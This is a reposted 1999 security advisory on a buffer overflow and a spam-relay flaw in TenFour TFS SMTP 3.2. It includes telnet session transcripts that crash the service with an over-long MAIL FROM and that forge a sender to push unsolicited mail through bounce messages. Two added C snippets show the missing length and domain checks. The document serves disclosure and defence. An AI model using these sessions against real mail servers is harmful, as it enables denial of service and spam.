
📄 tenfour tfs smtp 3.2 buffer overflow.txt

Posted by: cloudsky (晓舟·轩辕明月), Board: Security

Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow

Origin: 武汉白云黄鹤站 (Thu Sep  9 08:43:07 1999), local post

  

 INTRINsec Security Advisory 

  

  

Release Date     : August 30, 1999
Software         : TenFour TFS SMTP 3.2
Operating System : Windows NT 3.x / 4.x
Impact           : Attackers can use a misconfigured TFS SMTP for
                   spamming and can remotely crash the TFS SMTP Gateway.
Author           : Christophe.Lesur@INTRINsec.com
Status           : TenFour has been advised of this.
URLs             : http://www.intrinsec.com/

  

  

__ Digest __

  

  

The TenFour TFS SMTP Release 3.2 has two vulnerabilities: a buffer overflow and, under some circumstances and due to the inherent TFS architecture, the ability to be used for spamming.

The direct results are that an attacker can remotely crash your TFS SMTP Gateway or send unsolicited mail to someone (and to the TFS ADMINISTRATOR).

TenFour has been advised of this. Thanks to Roberto Correnti for his support. (http://www.tenfour.com)

  

  

__ Technical Details and Exploits __ 

  

  

TenFour TFS SMTP version 3.2 has two vulnerabilities: a buffer overflow and, under some circumstances, it can be used for spamming.

First: Buffer Overflow.

There is a major buffer overflow in TFS SMTP 3.2. When you connect to the SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo' command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP service with a nice protection fault. It's basically a buffer overflow, and it has been fixed in release 4.0.

This is the exploit:

  

  

         [clesur@raptor clesur]$ telnet mailhost.victim.com 25
         Trying 1.1.1.1...
         Connected to mailhost.victim.com.
         Escape character is '^]'.
         220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
         helo
         250 mailhost.victim.com, Hello

         mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>

         Connection closed by foreign host.
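
A bounded parser for the MAIL FROM argument, added here to show the length check whose absence produces the crash described above; it is not TenFour's or INTRINsec's code. The buffer size is an assumption taken from the advisory's 128-byte threshold, and the function name parse_mail_from is hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Assumed capacity: the advisory reports the crash above 128 bytes. */
#define PATH_BUF 128

/* Parse "MAIL FROM:<path>" into out (capacity outsz, NUL included).
 * Returns the SMTP reply code to send: 250 accepted, 501 rejected. */
int parse_mail_from(const char *line, char *out, size_t outsz)
{
    static const char verb[] = "MAIL FROM:";
    size_t i;

    if (out == NULL || outsz == 0)
        return 501;
    out[0] = '\0';
    if (line == NULL)
        return 501;

    /* SMTP verbs are case-insensitive; the session above types "mail from:".
     * A short line ends the loop at its NUL, so nothing is read past it. */
    for (i = 0; verb[i] != '\0'; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return 501;

    const char *p = line + i;
    while (*p == ' ')
        p++;
    if (*p != '<')
        return 501;
    p++;

    const char *end = strchr(p, '>');
    if (end == NULL)
        return 501;                 /* unterminated path */

    size_t len = (size_t)(end - p);
    if (len >= outsz)
        return 501;                 /* too long: refuse, never copy or truncate */

    for (i = 0; i < len; i++)
        if (!isgraph((unsigned char)p[i]))
            return 501;             /* no spaces or control bytes in a path */

    memcpy(out, p, len);
    out[len] = '\0';
    return 250;
}
```

The length is compared against the destination capacity before any byte is copied, so an over-long sender path costs the client a 501 reply and leaves the service running.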

  

  

  

Second: Spamming

The TFS SMTP engine accepts any mail by default and processes it in its kernel. In case of a deficient message (wrong recipient, wrong domain...), TFS SMTP is usually configured to warn the sender and the TFS ADMINISTRATOR by sending a 4-line warning AND the full message. Because there is no domain check before sending the message to the TFS core, it's possible to spam someone and the TFS administrator.

This is the exploit:

  

  

          [clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25
          Trying 1.1.1.1...
          Connected to mailhost.tfsvictim.com.
          Escape character is '^]'.
          220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2
          helo
          250 mailhost.tfsvictim.com, Hello
          mail from:<target@victim.com>
          250 Sender <target@victim.com> OK
          rcpt to:<target@victim.com>
          250 Recipient <target@victim.com> OK
          data
          354 Begin data transfer. End with period.
          from: target@victim.com
          to: target@victim.com

          <YOUR MESSAGE BODY HERE>
          .

          250 Message accepted
          quit
          221 Connection closed
          Connection closed by foreign host.

  

  

The spammed user will receive this message in their mailbox:

  

          Message 22:
          From target@victim.com Thu Jul 29 09:49:40 1999
          Delivered-To: target@victim.com
          From: target@victim.com
          Date: Thu, 29 Jul 1999 11:44:03 +0200
          Subject: <No subject>
          MIME-version: 1.0
          Content-transfer-encoding: quoted-printable

          ####################################################
          This message was not delivered to
          target@victim.com
          TFS Admin was informed with a copy of this message
          Sender was informed with a copy of this message
          ####################################################

          <YOUR MESSAGE BODY HERE>
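
A recipient-domain check applied while the client is still connected, added here to show the "domain check" the advisory says is missing; it is not TenFour's code. The function rcpt_policy, the trusted-client flag and the local-domain list are hypothetical, and the domain names used with it are the placeholders from the transcript above.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive equality for ASCII domain names. */
static int domain_eq(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0') {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Decide the reply to "RCPT TO:<addr>" before any message data is accepted.
 * local_domains:    NULL-terminated list of domains this gateway delivers for.
 * client_may_relay: nonzero only for trusted internal clients (assumption).
 * Returns 250 to accept, 501 for a malformed address, 550 to refuse. */
int rcpt_policy(const char *addr, const char *const *local_domains,
                int client_may_relay)
{
    size_t i;
    const char *at;

    if (addr == NULL)
        return 501;
    at = strrchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0')
        return 501;

    for (i = 0; local_domains != NULL && local_domains[i] != NULL; i++)
        if (domain_eq(at + 1, local_domains[i]))
            return 250;

    /* Foreign domain from an untrusted client: refuse in-session, so the
     * gateway never accepts a message it would later have to bounce,
     * body included, to a sender address it cannot verify. */
    return client_may_relay ? 250 : 550;
}
```

With this check in front of the mail core, the session shown above ends at the RCPT step with a 550 reply and no warning message is generated for the forged sender or the administrator.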

  

  

__ Solutions __ 

  

For these vulnerabilities, TenFour suggests upgrading to a version greater than 4.0.

  

__ Contacts __ 

  

  

 -- Tenfour -- 

  

 TenFour South Europe 

 ITFamily Sarl 

 Le Technoparc 

 15, rue Edouard Jeanneret 

 78306 Poissy Cedex 

 France 

 Tel: +33 1 39 22 65 15 

 Fax: +33 1 39 11 49 77 

 WWW: http://www.tenfour.fr 

  

 -- INTRINsec -- 

  

 INTRINsec is a computer Security company. 

 http://www.INTRINsec.com 

 This advisory is available in French on our website.

  

  

__ DISCLAIMERS __

INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDES THIS INFORMATION "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  

-- 

Christophe Lesur         Security Consultant 

INTRINsec 

mailto:christophe.lesur@INTRINsec.com 

  

-- 

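            I asked the passing wind: am I too late?
            The wind sighed: yes, they have already declared war.
            I asked the awakening earth: is there still hope?
            The earth rubbed its eyes: there is, there are still countless generations of youth.
            I asked the heroic spirits in the sky: do you believe it?
            The spirits departed smiling: we believe; hope remains.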

  
